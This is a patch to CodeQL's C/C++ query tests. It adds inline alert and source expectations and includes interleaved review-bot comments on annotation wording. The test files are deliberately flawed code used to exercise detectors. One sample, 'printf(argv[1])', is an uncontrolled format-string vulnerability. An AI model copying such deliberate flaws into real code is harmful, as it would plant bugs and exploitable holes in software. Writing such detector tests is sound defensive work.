@@ -411,7 +411,7 @@ void mult_overflow() { // to 64-bit unsigned. x = 274177UL; y = 67280421310721UL; - if (x * y == 1) {} // always true [BUG: reported as always false] + if (x * y == 1) {} // always true [BUG: reported as always false] // $ Alert[cpp/constant-comparison] // This bug appears to be caused by // `RangeAnalysisUtils::typeUpperBound(unsigned long)` having a result of diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp index ce04ddcf0814..fe779ad2844b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp @@ -33,13 +33,13 @@ int extreme_values(void) unsigned long long int x = 0xFFFFFFFFFFFFFFFF; unsigned long long int y = 0xFFFFFFFFFFFF; - if (x >> 1 >= 0xFFFFFFFFFFFFFFFF) {} // always false + if (x >> 1 >= 0xFFFFFFFFFFFFFFFF) {} // always false // $ Alert[cpp/constant-comparison] if (x >> 1 >= 0x8000000000000000) {} // always false [NOT DETECTED] if (x >> 1 >= 0x7FFFFFFFFFFFFFFF) {} // always true [NOT DETECTED] if (x >> 1 >= 0xFFFFFFFFFFFFFFF) {} // always true [NOT DETECTED] - if (y >> 1 >= 0xFFFFFFFFFFFF) {} // always false - if (y >> 1 >= 0x800000000000) {} // always false - if (y >> 1 >= 0x7FFFFFFFFFFF) {} // always true - if (y >> 1 >= 0xFFFFFFFFFFF) {} // always true + if (y >> 1 >= 0xFFFFFFFFFFFF) {} // always false // $ Alert[cpp/constant-comparison] + if (y >> 1 >= 0x800000000000) {} // always false // $ Alert[cpp/constant-comparison] + if (y >> 1 >= 0x7FFFFFFFFFFF) {} // always true // $ Alert[cpp/constant-comparison] + if (y >> 1 >= 0xFFFFFFFFFFF) {} // always true // $ Alert[cpp/constant-comparison] } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref index e3713c2911d9..150f789c59dc 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/PointlessComparison.ql +query: Likely Bugs/Arithmetic/PointlessComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp index 0ba766eda1d2..2496e5faf299 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp @@ -54,7 +54,7 @@ static int foo(size_t *size) { int bar; - if (*size <= MAX_VAL) // BAD (pointless comparison) [NO LONGER REPORTED] + if (*size <= MAX_VAL) // BAD (pointless comparison) [NO LONGER REPORTED] // $ Alert[cpp/constant-comparison] *size = MAX_VAL; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp index a211b2307805..258ceea379da 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp @@ -6,7 +6,7 @@ bool sometimesPointless(T param) { template bool alwaysPointless(T param) { short local = param; - return local <= 0xFFFF; // BAD (in all instantiations) + return local <= 0xFFFF; // BAD (in all instantiations) // $ Alert[cpp/constant-comparison] } static int caller(int i) { 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref index 4cf4c8eb0942..7a798dc7e917 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/UnsignedGEZero.ql +query: Likely Bugs/Arithmetic/UnsignedGEZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp index a56f9c88c81d..80f2fc6bc878 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp @@ -6,7 +6,7 @@ bool sometimesPointless(T param) { template bool alwaysPointless(T param) { unsigned int local = param; - return local >= 0; // BAD (in all instantiations) + return local >= 0; // BAD (in all instantiations) // $ Alert } static int caller(int i) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c index 749468450ef9..4ef600cc877f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c @@ -37,7 +37,7 @@ void myFunction() { myEnum1 e1; myEnum2 e2; - if (ui >= 0) { // violation + if (ui >= 0) { // violation // $ Alert } if (ui >= 1) { } 
@@ -45,21 +45,21 @@ void myFunction() { } if (ui < 0) { } - if (UI >= ZERO) { // violation + if (UI >= ZERO) { // violation // $ Alert } if (si >= 0) { } if (ui_ptr >= NULL) { // unsafe, but not a violation of UnsignedGEZero.ql } - if (uc >= 0) { // violation + if (uc >= 0) { // violation // $ Alert } if (sc >= 0) { } - if (u16 >= 0) { // violation + if (u16 >= 0) { // violation // $ Alert } if (s16 >= 0) { } - if (ull >= 0) { // violation + if (ull >= 0) { // violation // $ Alert } if (sll >= 0) { } @@ -72,33 +72,33 @@ void myFunction() { if (e2 >= 0) { } - if (ui >= const_zero) { // violation + if (ui >= const_zero) { // violation // $ Alert } if (ui >= maybe_zero) { } - if ((unsigned int)si >= 0) { // violation + if ((unsigned int)si >= 0) { // violation // $ Alert } if ((signed int)ui >= 0) { } - if ((unsigned char)ui >= 0) { // violation + if ((unsigned char)ui >= 0) { // violation // $ Alert } if ((signed char)ui >= 0) { } - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } if ((signed char)si >= 0) { } - if ((signed int)uc >= 0) { // violation + if ((signed int)uc >= 0) { // violation // $ Alert } - if ((unsigned int)uc >= 0) { // violation + if ((unsigned int)uc >= 0) { // violation // $ Alert } if ((signed int)sc >= 0) { } - if ((unsigned int)sc >= 0) { // violation + if ((unsigned int)sc >= 0) { // violation // $ Alert } - assert(ui >= 0); // violation + assert(ui >= 0); // violation // $ Alert assert(si >= 0); CHECK_RANGE(ui, 0, 10); // reasonable use 
@@ -108,32 +108,32 @@ void myFunction() { CHECK_RANGE(e2, BANANA, PEAR); CHECK_RANGE(e2, 0, PEAR); - assert(ui >= 0 && ui <= 100); // violation + assert(ui >= 0 && ui <= 100); // violation // $ Alert assert(CHECK_RANGE(ui, 0, 10)); // reasonable use assert(UI >= ZERO); // violation (not detected) - assert(ui GE 0); // violation + assert(ui GE 0); // violation // $ Alert - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed int)si >= 0) { // violation + if ((unsigned char)(signed int)si >= 0) { // violation // $ Alert } - if ((signed int)(unsigned char)si >= 0) { // violation + if ((signed int)(unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed char)si >= 0) { // violation + if ((unsigned char)(signed char)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)si >= 0) { } - if ((signed int)(unsigned char)(signed int)si >= 0) { // violation + if ((signed int)(unsigned char)(signed int)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)(signed int)si >= 0) { } - if ((signed int)(unsigned char)(signed char)si >= 0) { // violation + if ((signed int)(unsigned char)(signed char)si >= 0) { // violation // $ Alert } if (ui <= 0) { } - if (0 <= ui) { // violation + if (0 <= ui) { // violation // $ Alert } if (0 < ui) { } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp index 6b939e29b76d..c07e278d5b46 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp @@ -37,7 +37,7 @@ void myFunction() { myEnum1 e1; myEnum2 e2; - if (ui >= 0) { // violation + if (ui >= 0) { // violation // $ Alert } if (ui >= 1) { } 
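Review bot: The line `assert(UI >= ZERO); // violation (not detected)` in this hunk is left without an inline expectation, so the known false negative is recorded only in free text that the test does not check. Now that the .qlref post-processes with `utils/test/InlineExpectationsTestQuery.ql`, it could be written as `assert(UI >= ZERO); // violation (not detected) // $ MISSING: Alert`. The gap would then be tracked, and the annotation should be flagged for removal if the query ever starts reporting the line. The same unannotated line appears in the matching `@@ -108,32 +108,32 @@` hunk of UnsignedGEZero.cpp. The body of `myFunction` starts and ends outside this hunk.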
@@ -45,21 +45,21 @@ void myFunction() { } if (ui < 0) { } - if (UI >= ZERO) { // violation + if (UI >= ZERO) { // violation // $ Alert } if (si >= 0) { } if (ui_ptr >= NULL) { // unsafe, but not a violation of UnsignedGEZero.ql } - if (uc >= 0) { // violation + if (uc >= 0) { // violation // $ Alert } if (sc >= 0) { } - if (u16 >= 0) { // violation + if (u16 >= 0) { // violation // $ Alert } if (s16 >= 0) { } - if (ull >= 0) { // violation + if (ull >= 0) { // violation // $ Alert } if (sll >= 0) { } @@ -72,33 +72,33 @@ void myFunction() { if (e2 >= 0) { } - if (ui >= const_zero) { // violation + if (ui >= const_zero) { // violation // $ Alert } if (ui >= maybe_zero) { } - if ((unsigned int)si >= 0) { // violation + if ((unsigned int)si >= 0) { // violation // $ Alert } if ((signed int)ui >= 0) { } - if ((unsigned char)ui >= 0) { // violation + if ((unsigned char)ui >= 0) { // violation // $ Alert } if ((signed char)ui >= 0) { } - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } if ((signed char)si >= 0) { } - if ((signed int)uc >= 0) { // violation + if ((signed int)uc >= 0) { // violation // $ Alert } - if ((unsigned int)uc >= 0) { // violation + if ((unsigned int)uc >= 0) { // violation // $ Alert } if ((signed int)sc >= 0) { } - if ((unsigned int)sc >= 0) { // violation + if ((unsigned int)sc >= 0) { // violation // $ Alert } - assert(ui >= 0); // violation + assert(ui >= 0); // violation // $ Alert assert(si >= 0); CHECK_RANGE(ui, 0, 10); // reasonable use 
@@ -108,32 +108,32 @@ void myFunction() { CHECK_RANGE(e2, BANANA, PEAR); CHECK_RANGE(e2, 0, PEAR); - assert(ui >= 0 && ui <= 100); // violation + assert(ui >= 0 && ui <= 100); // violation // $ Alert assert(CHECK_RANGE(ui, 0, 10)); // reasonable use assert(UI >= ZERO); // violation (not detected) - assert(ui GE 0); // violation + assert(ui GE 0); // violation // $ Alert - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed int)si >= 0) { // violation + if ((unsigned char)(signed int)si >= 0) { // violation // $ Alert } - if ((signed int)(unsigned char)si >= 0) { // violation + if ((signed int)(unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed char)si >= 0) { // violation + if ((unsigned char)(signed char)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)si >= 0) { } - if ((signed int)(unsigned char)(signed int)si >= 0) { // violation + if ((signed int)(unsigned char)(signed int)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)(signed int)si >= 0) { } - if ((signed int)(unsigned char)(signed char)si >= 0) { // violation + if ((signed int)(unsigned char)(signed char)si >= 0) { // violation // $ Alert } if (ui <= 0) { } - if (0 <= ui) { // violation + if (0 <= ui) { // violation // $ Alert } if (0 < ui) { } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref index 4cf4c8eb0942..7a798dc7e917 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/UnsignedGEZero.ql +query: Likely Bugs/Arithmetic/UnsignedGEZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref index 48d9feb20721..2ba384a7922b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref @@ -1 +1,2 @@ -Likely Bugs/ContinueInFalseLoop.ql +query: Likely Bugs/ContinueInFalseLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp index 0ece8727e666..ec59c0aca236 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp @@ -10,7 +10,7 @@ void test1(int x) do { if (cond()) - continue; // BAD + continue; // BAD // $ Alert if (cond()) break; } while (false); @@ -56,7 +56,7 @@ void test1(int x) do { if (cond()) - continue; // BAD + continue; // BAD // $ Alert if (cond()) break; } while (false); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref index 2e2747737a9b..2e410dcc8c8c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/ArrayArgSizeMismatch.ql +query: Likely Bugs/Conversion/ArrayArgSizeMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp index 52b8f41bf22b..122d6b3a6cca 100644 
--- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp @@ -21,7 +21,7 @@ void test(float f3[3], float f4[4], float f5[5], float *fp) f(arr3); // GOOD f(arr4); // GOOD f(arr5); // GOOD - g(arr3); // BAD + g(arr3); // BAD // $ Alert g(arr4); // GOOD g(arr5); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected index 75e2e581664e..0b8acb7030d6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected 
@@ -1,3 +1,13 @@ +#select +| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | edges | test.cpp:26:29:26:29 | b | test.cpp:27:2:27:2 | b | provenance | | | test.cpp:30:34:30:34 | b | test.cpp:31:2:31:2 | b | provenance | | 
@@ -28,13 +38,3 @@ nodes | test.cpp:87:25:87:26 | d2 | semmle.label | d2 | | test.cpp:88:21:88:22 | d2 | semmle.label | d2 | subpaths -#select -| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref index 4e95e41b5cb9..dc496d3c7c6a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/CastArrayPointerArithmetic.ql +query: Likely Bugs/Conversion/CastArrayPointerArithmetic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp index fce974f6012f..95d6200f11e6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/test.cpp @@ -24,15 +24,15 @@ class DerivedSameSize: public Base { }; void dereference_base(Base *b) { - b[2].x; + b[2].x; // $ Alert } void dereference_array_base(Base b[]) { - b[2].x; + b[2].x; // $ Alert } void pointer_arith_base(Base *b) { - b + 2; + b + 2; // $ Alert } void dereference_derived(Derived *d) { 
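Review bot: The three alert sites in `dereference_base`, `dereference_array_base` and `pointer_arith_base` get a bare `// $ Alert` with no explanation, while most other annotated sinks in this patch keep a BAD/GOOD remark next to the expectation. A reader landing on `b[2].x;` cannot tell from that line why indexing a `Base *` is reported. The reason is stated only at the call sites in `test()`: the pointer may come from an array of a derived type, so the element stride can be wrong. I would write `b[2].x; // BAD: b may point into an array of a derived type // $ Alert`, with the same wording on `b + 2;`.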
@@ -54,9 +54,9 @@ void char_pointer_arith(Base *b) { void test () { Derived d[4]; - dereference_base(d); // BAD: implicit conversion to Base* - dereference_array_base(d); // BAD: implicit conversion to Base* - pointer_arith_base(d); // BAD: implicit conversion to Base* + dereference_base(d); // BAD: implicit conversion to Base* // $ Source + dereference_array_base(d); // BAD: implicit conversion to Base* // $ Source + pointer_arith_base(d); // BAD: implicit conversion to Base* // $ Source dereference_derived(d); // GOOD: implicit conversion to Derived*, which will be the right size dereference_array_derived(d); // GOOD: implicit conversion to Derived*, which will be the right size @@ -71,9 +71,9 @@ void test () { DerivedSameSize dss[4]; - dereference_base(dss); // BAD: same size on Linux but different on Windows - dereference_array_base(dss); // BAD: same size on Linux but different on Windows - pointer_arith_base(dss); // BAD: same size on Linux but different on Windows + dereference_base(dss); // BAD: same size on Linux but different on Windows // $ Source + dereference_array_base(dss); // BAD: same size on Linux but different on Windows // $ Source + pointer_arith_base(dss); // BAD: same size on Linux but different on Windows // $ Source DerivedNoField dnf[4]; @@ -83,9 +83,9 @@ void test () { Derived2 d2[4]; - dereference_base(d2); // BAD: implicit conversion to Base* - dereference_array_base(d2); // BAD: implicit conversion to Base* - pointer_arith_base(d2); // BAD: implicit conversion to Base* + dereference_base(d2); // BAD: implicit conversion to Base* // $ Source + dereference_array_base(d2); // BAD: implicit conversion to Base* // $ Source + pointer_arith_base(d2); // BAD: implicit conversion to Base* // $ Source dereference_derived(d2); // GOOD: implicit conversion to Derived*, which will be the right size dereference_array_derived(d2); // GOOD: implicit conversion to Derived*, which will be the right size 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref index ff7d11977d9c..7ae992bd7520 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/ImplicitDowncastFromBitfield.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/ImplicitDowncastFromBitfield.ql +query: Likely Bugs/Conversion/ImplicitDowncastFromBitfield.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp index 3bcb6afe4b4c..0cef06d32e23 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ImplicitDowncastFromBitfield/test.cpp @@ -7,7 +7,7 @@ int getX1(my_struct m) { } short getX2(my_struct m) { - return m.x; // BAD + return m.x; // BAD // $ Alert } short getX3(my_struct m) { @@ -23,7 +23,7 @@ short getX5(my_struct m) { } const char& getx6(my_struct& m) { - const char& result = m.x; // BAD + const char& result = m.x; // BAD // $ Alert return result; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref index cb6a31a262e3..a1dd642e7985 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/LossyFunctionResultCast.qlref 
@@ -1 +1,2 @@ -Likely Bugs/Conversion/LossyFunctionResultCast.ql +query: Likely Bugs/Conversion/LossyFunctionResultCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp index 552f3eecc39c..d12fe7910493 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/LossyFunctionResultCast/test.cpp @@ -30,19 +30,19 @@ void test1() setPosInt(getInt()); setPosFloat(getInt()); } - if (getFloat()) // BAD + if (getFloat()) // BAD // $ Alert { - setPosInt(getFloat()); // BAD + setPosInt(getFloat()); // BAD // $ Alert setPosFloat(getFloat()); } - if (getDouble()) // BAD + if (getDouble()) // BAD // $ Alert { - setPosInt(getDouble()); // BAD + setPosInt(getDouble()); // BAD // $ Alert setPosFloat(getDouble()); } - if (getMyLD()) // BAD + if (getMyLD()) // BAD // $ Alert { - setPosInt(getMyLD()); // BAD + setPosInt(getMyLD()); // BAD // $ Alert setPosFloat(getMyLD()); } if (getFloatPtr()) @@ -98,11 +98,11 @@ int test2(double v, double w, int n) case 2: return pow(10, v); // GOOD case 3: - return pow(2.5, v); // BAD + return pow(2.5, v); // BAD // $ Alert case 4: - return pow(v, 2); // BAD + return pow(v, 2); // BAD // $ Alert case 5: - return pow(v, w); // BAD + return pow(v, w); // BAD // $ Alert }; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c index d7b60aebe88a..8ff9ddbf3768 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.c 
@@ -25,9 +25,9 @@ extern char *any_random_function(const char *); #define NULL ((void*)0) #define _(X) gettext(X) -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source if(argc > 1) - printf(argv[1]); // BAD + printf(argv[1]); // BAD // $ Alert else printf("No argument supplied.\n"); // GOOD @@ -38,11 +38,11 @@ int main(int argc, char **argv) { printf(ngettext("One argument\n", "%d arguments\n", argc-1), argc-1); // GOOD printf(gettext("%d arguments\n"), argc-1); // GOOD - printf(any_random_function("%d arguments\n"), argc-1); // BAD + printf(any_random_function("%d arguments\n"), argc-1); // BAD // $ Alert - printf(_(any_random_function("%d arguments\n")), argc-1); // BAD + printf(_(any_random_function("%d arguments\n")), argc-1); // BAD // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected index 63851030bba5..20ac0f055a1b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected 
